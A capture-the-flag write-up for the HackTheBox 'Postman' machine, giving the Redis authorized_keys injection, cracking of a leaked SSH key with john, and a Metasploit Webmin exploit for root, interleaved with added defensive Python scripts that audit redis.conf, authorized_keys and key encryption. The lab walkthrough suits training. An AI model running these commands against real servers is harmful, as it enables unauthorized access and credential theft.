Postman is an easy-rated box on HackTheBox. It just retired, and here's my writeup!
First, let's add the hostname postman to the hosts file so that we don't always need to type in the IP address. Open /etc/hosts in vim and add a line mapping 10.10.10.160 to postman:
Hit i (going to input mode)
:x (saving and exiting)
Now, let's run an nmap scan to see what services are running. We will be checking all ports, hence the -p- option.
nmap -A -T4 -p- 10.10.10.160
Open ports and services found:
21 - SSL
80 - http
10000 - Miniserv 1.910
6379 - redis
Miniserv on port 10000, that's something I haven't seen very often. Let's check if it has a webpage.
We can see a Webmin login prompt. Trying admin/admin there doesn't give us anything, and I don't think brute force is the name of the game here.
Now, the other interesting service available is redis. To check the redis port:
apt-get install redis-tools #installing the redis command line tools
redis-cli -h postman #connecting to the postman server via redis-cli
ping #checking the connection
pong #we get a pong back, that's nice
Now that we know that the connection works fine, let's quit it.
This version of redis is affected by a well-known issue. You can read about it at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
As suggested by Packet Storm Security, let's try generating an RSA key and see if that works.
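From the defender's side, everything that makes this technique work is visible in redis.conf: an instance bound to a reachable address, protected-mode off, no password, and a CONFIG command that any client may call. The script below is an added example (not part of this write-up and not Redis's own tooling) that parses a redis.conf and reports those four conditions; both configs are constructed samples and the requirepass value is a placeholder.

```python
"""Flag the redis.conf settings that let an unauthenticated client change
dir/dbfilename and SAVE a dump wherever it likes.
Added example, not from the write-up or from Redis; configs are constructed."""

WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass PLACEHOLDER-change-me
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_conf(text: str):
    """Return (settings: option -> values in file order, renamed: COMMAND -> new name)."""
    settings, renamed = {}, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key == "rename-command":
            # rename-command CONFIG "" disables the command outright
            cmd, _, new = value.strip().partition(" ")
            renamed[cmd.upper()] = new.strip().strip('"')
        else:
            settings.setdefault(key, []).append(value.strip())
    return settings, renamed


def audit(text: str) -> list:
    """Return a list of human-readable findings; an empty list means none of the
    four preconditions for the authorized_keys trick are present."""
    settings, renamed = parse_conf(text)
    findings = []
    addrs = " ".join(settings.get("bind", [])).split()
    if not addrs or any(a in ("0.0.0.0", "*", "::") for a in addrs):
        findings.append("bind: Redis is reachable on all interfaces")
    if settings.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode: disabled")
    if "requirepass" not in settings:
        findings.append("requirepass: unset, any client that reaches the port can run commands")
    if renamed.get("CONFIG", "CONFIG") == "CONFIG":
        findings.append("CONFIG: still exposed, clients can change dir and dbfilename before SAVE")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or ["no findings"])
```

Run it against a real /etc/redis/redis.conf by reading the file into `audit()`; on the weak sample it reports all four findings, on the hardened one none.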
ssh-keygen -t rsa -C "redis@postman"
Create the private/public key pair and save both at ~/HTB/Postman.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
Now, let's upload the contents of the test.txt file to the redis server.
cat test.txt | redis-cli -h 10.10.10.160 -x set crackit
The -x option tells redis-cli to read the last argument from STDIN, which in our case is the content of test.txt.
redis-cli -h 10.10.10.160
config get dir
config set dbfilename "authorized_keys"
save
quit
We saved the contents of our test.txt file as authorized_keys on the server.
Now, let's try to log in with the private/public key pair.
ssh -i id_rsa redis@10.10.10.160
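What this leaves on the host is an authorized_keys file that is mostly a Redis RDB dump with a single key line embedded in it, which is why the blank-line padding in test.txt was needed. The script below is an added example (not from this write-up) that checks an authorized_keys file for exactly that: the RDB magic at the start and any line that is not a parsable public key. The sample files are constructed; the RDB bytes only approximate a real dump's framing and the key material is dummy.

```python
"""Check an authorized_keys file for content that is not an SSH public key.
Added example, not from the write-up; sample files are constructed."""
import base64
import binascii
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def make_sample_key_line(comment: bytes = b"user@example") -> bytes:
    # Constructed: a syntactically valid ed25519 public key line with dummy key bytes.
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
    return b"ssh-ed25519 " + base64.b64encode(blob) + b" " + comment


CLEAN_FILE = make_sample_key_line() + b"\n"

# Constructed approximation of the file after a Redis SAVE writes its dump into it:
# RDB header and key name, the padded value, then the EOF marker and checksum.
INJECTED_FILE = (
    b"REDIS0009\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x07crackit\xc5"
    + b"\n\n" + make_sample_key_line(b"redis@postman") + b"\n\n"
    + b"\xff" + bytes.fromhex("1122334455667788")
)


def check_authorized_keys(data: bytes):
    """Return (number of valid key lines, list of findings)."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("file starts with the Redis RDB magic 'REDIS'")
    valid = 0
    for n, raw in enumerate(data.split(b"\n"), 1):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        if any(b > 0x7E or (b < 0x20 and b != 0x09) for b in line):
            findings.append(f"line {n}: non-printable bytes, not a key line")
            continue
        fields = line.decode("ascii").split()
        # an options field may precede the key type, so locate the type token
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            findings.append(f"line {n}: no recognised key type and key data")
            continue
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
        except binascii.Error:
            findings.append(f"line {n}: key data is not valid base64")
            continue
        # the first wire-format string inside the blob must repeat the declared type
        (n_type,) = struct.unpack(">I", blob[:4]) if len(blob) >= 4 else (0,)
        if blob[4:4 + n_type] != fields[idx].encode():
            findings.append(f"line {n}: key blob does not match declared type {fields[idx]}")
            continue
        valid += 1
    return valid, findings


if __name__ == "__main__":
    print(check_authorized_keys(CLEAN_FILE))
    print(check_authorized_keys(INJECTED_FILE))
```

Pointed at a real file (`check_authorized_keys(open(path, "rb").read())`), a clean file returns a key count and no findings; the injected sample returns the RDB-magic finding plus one finding for the header line and one for the trailer, while the embedded key still counts as valid, which is exactly why sshd accepts it.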
You are in!
We've got the initial foothold; now it's time for privesc!
cd /opt/
ls
Listing the directory there, you should see a file named id_rsa.bak.
That's interesting. We should check whether it really is a backup of an id_rsa file, in which case our job will be really easy.
Copy all of it, and in another terminal window on our attacking machine, open a new file named id_rsa.bak in vim.
Again, hit i to go to input mode and paste everything there.
:x to save and exit.
Now, we will try to crack the password used with the RSA key.
updatedb
locate ssh2john.py #finds where the ssh2john.py file is
cp $(locate ssh2john.py) . #copies ssh2john.py from wherever it is to the present working directory
python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts it to a john usable format
john id_rsa.bak.hash --wordlist=rockyou.txt #using the rockyou.txt wordlist and john, we try to crack the password
You should get a password: "computer2008".
However, when you try to ssh in with it, you will be denied.
Now, go back to the window where you are logged in as the redis user and switch to Matt with su Matt.
Give the password as computer2008.
You are user now!
cd ~
cat user.txt
Now, go to the browser and try to log in to Webmin using Matt's credentials (notice that it is Matt and not matt).
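Whether a leaked private key can be cracked this quickly depends on how its passphrase was applied, so an inventory of key files is worth doing on the defending side. The script below is an added example (not from this write-up) that classifies a private key file as unencrypted, legacy PEM (the passphrase goes through a single MD5 pass, which is what makes a wordlist run cheap), or the openssh-key-v1 format with bcrypt, reporting the round count that `ssh-keygen -a N` sets. The sample keys are constructed and their base64 bodies carry no real key material.

```python
"""Classify how an OpenSSH private key file protects its contents.
Added example, not part of the original write-up; sample keys are constructed."""
import base64
import struct


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _take_string(buf: bytes, off: int):
    """Read one wire-format string at offset off; return (value, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def sample_openssh_v1(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Constructed openssh-key-v1 file, truncated after the fields we inspect."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    body = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    b64 = base64.b64encode(body).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM samples; the base64 body is filler, not a key.
LEGACY_UNENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""

LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A1B2C3D4E5F60718293A4B5C6D7E8F9

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""


def classify_private_key(pem: str) -> dict:
    lines = [l.strip() for l in pem.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-framed private key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not body.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(magic)
        cipher, off = _take_string(body, off)
        kdf, off = _take_string(body, off)
        kdfopts, off = _take_string(body, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _take_string(kdfopts, 0)   # kdfoptions = string salt, uint32 rounds
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        if not encrypted:
            verdict = "unencrypted"
        elif rounds is not None:
            verdict = f"bcrypt, {rounds} rounds"
        else:
            verdict = f"kdf {kdf.decode()}"
        return {"format": "openssh-key-v1", "encrypted": encrypted,
                "kdf": kdf.decode(), "rounds": rounds, "verdict": verdict}
    # legacy PEM: encryption is signalled by RFC 1421 style headers before the body
    headers = {}
    for l in lines[1:-1]:
        if ":" in l:
            k, v = l.split(":", 1)
            headers[k.strip()] = v.strip()
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    return {"format": "legacy-pem", "encrypted": encrypted,
            "kdf": "md5" if encrypted else None, "rounds": 1 if encrypted else None,
            "verdict": "legacy KDF: one MD5 pass over the passphrase, cheap to attack offline"
            if encrypted else "unencrypted"}


if __name__ == "__main__":
    for pem in (LEGACY_UNENCRYPTED, LEGACY_ENCRYPTED,
                sample_openssh_v1(b"aes256-ctr", b"bcrypt", 16)):
        print(classify_private_key(pem)["verdict"])
```

Feed it the text of each ~/.ssh/id_* file you find; anything reported as legacy PEM or unencrypted is a key that a backup file like the one in /opt would hand over cheaply, and re-saving it with `ssh-keygen -p -a 16` moves it to the bcrypt-protected format.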
So, that works.
Now, log out as Matt from both the terminal and Webmin.
Back on your Kali machine:
msfconsole
search webmin
use linux/http/webmin_packageup_rce
options
set rhosts postman
set password computer2008
set username Matt
set ssl true
set lhost <your kali machine's ip>
exploit
And that should work!
Congratulations, you're root now!
Thank you for reading, feel free to share it if you like it!